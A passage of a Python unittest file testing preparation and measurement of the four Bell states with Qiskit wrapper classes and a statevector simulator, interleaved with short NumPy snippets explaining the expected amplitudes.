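                 [0, 0, 0, 1],
                 [0, 0, 1, 0],
                 [0, 1, 0, 0]])
ket00 = np.array([1, 0, 0, 0], dtype=complex)
phi_plus = CNOT @ H_on_q0 @ ket00
# Expect |phi+> = (|00> + |11>)/sqrt(2)
np.testing.assert_allclose(phi_plus,
                           np.array([1, 0, 0, 1]) / np.sqrt(2),
                           rtol=1e-7, atol=1e-7)
```

This mirrors what the statevector-simulator assertion in the test verifies, without invoking a backend.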
# Test #2 for preparing the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State: |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_bell_state_phi_minus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Bell State: |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array = array([((1. / sqrt(2.)) + 0.j),
(0. + 0.j),
(0. + 0.j),
(-(1. / sqrt(2.)) + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
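Test #2's target state differs from |ϕ^+⟩ only by a Z applied to one qubit after the EPR circuit; this is one standard preparation, and whether QiskitBellState uses exactly this gate sequence is an assumption. A NumPy-only check of that identity:

```python
import numpy as np

# |phi+> = (|00> + |11>)/sqrt(2). Applying Z to qubit 0 negates every
# amplitude whose q0 bit is 1 (indices 1 and 3 in little-endian
# ordering), yielding |phi-> = (|00> - |11>)/sqrt(2).
phi_plus = np.array([1, 0, 0, 1], dtype=complex) / np.sqrt(2)
Z_on_q0 = np.diag([1.0, -1.0, 1.0, -1.0])  # I (x) Z, little-endian
phi_minus = Z_on_q0 @ phi_plus
np.testing.assert_allclose(phi_minus,
                           np.array([1, 0, 0, -1]) / np.sqrt(2),
                           rtol=1e-7, atol=1e-7)
```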
# Test #3 for preparing the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State: |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_bell_state_psi_plus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Bell State: |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array = array([(0. + 0.j),
((1. / sqrt(2.)) + 0.j),
((1. / sqrt(2.)) + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for preparing the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State: |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_bell_state_psi_minus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Bell State: |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array = array([(0. + 0.j),
((1. / sqrt(2.)) + 0.j),
(-(1. / sqrt(2.)) + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for preparing and measuring the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
class PrepareAndMeasureEPRPairBellStatePhiPlusTests(unittest.TestCase):
# Test #1 for preparing and measuring the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 3) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for preparing and measuring the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Preparation of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for preparing and measuring the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Preparation of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for preparing and measuring the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both the 1st and 2nd Qubits;
# 3) Preparation of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for preparing and measuring the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
class PrepareAndMeasureBellStatePhiMinusTests(unittest.TestCase):
# Test #1 for preparing and measuring the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 3) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for preparing and measuring the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Preparation of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 4) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for preparing and measuring the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Preparation of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 4) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for preparing and measuring the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both the 1st and 2nd Qubits;
# 3) Preparation of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
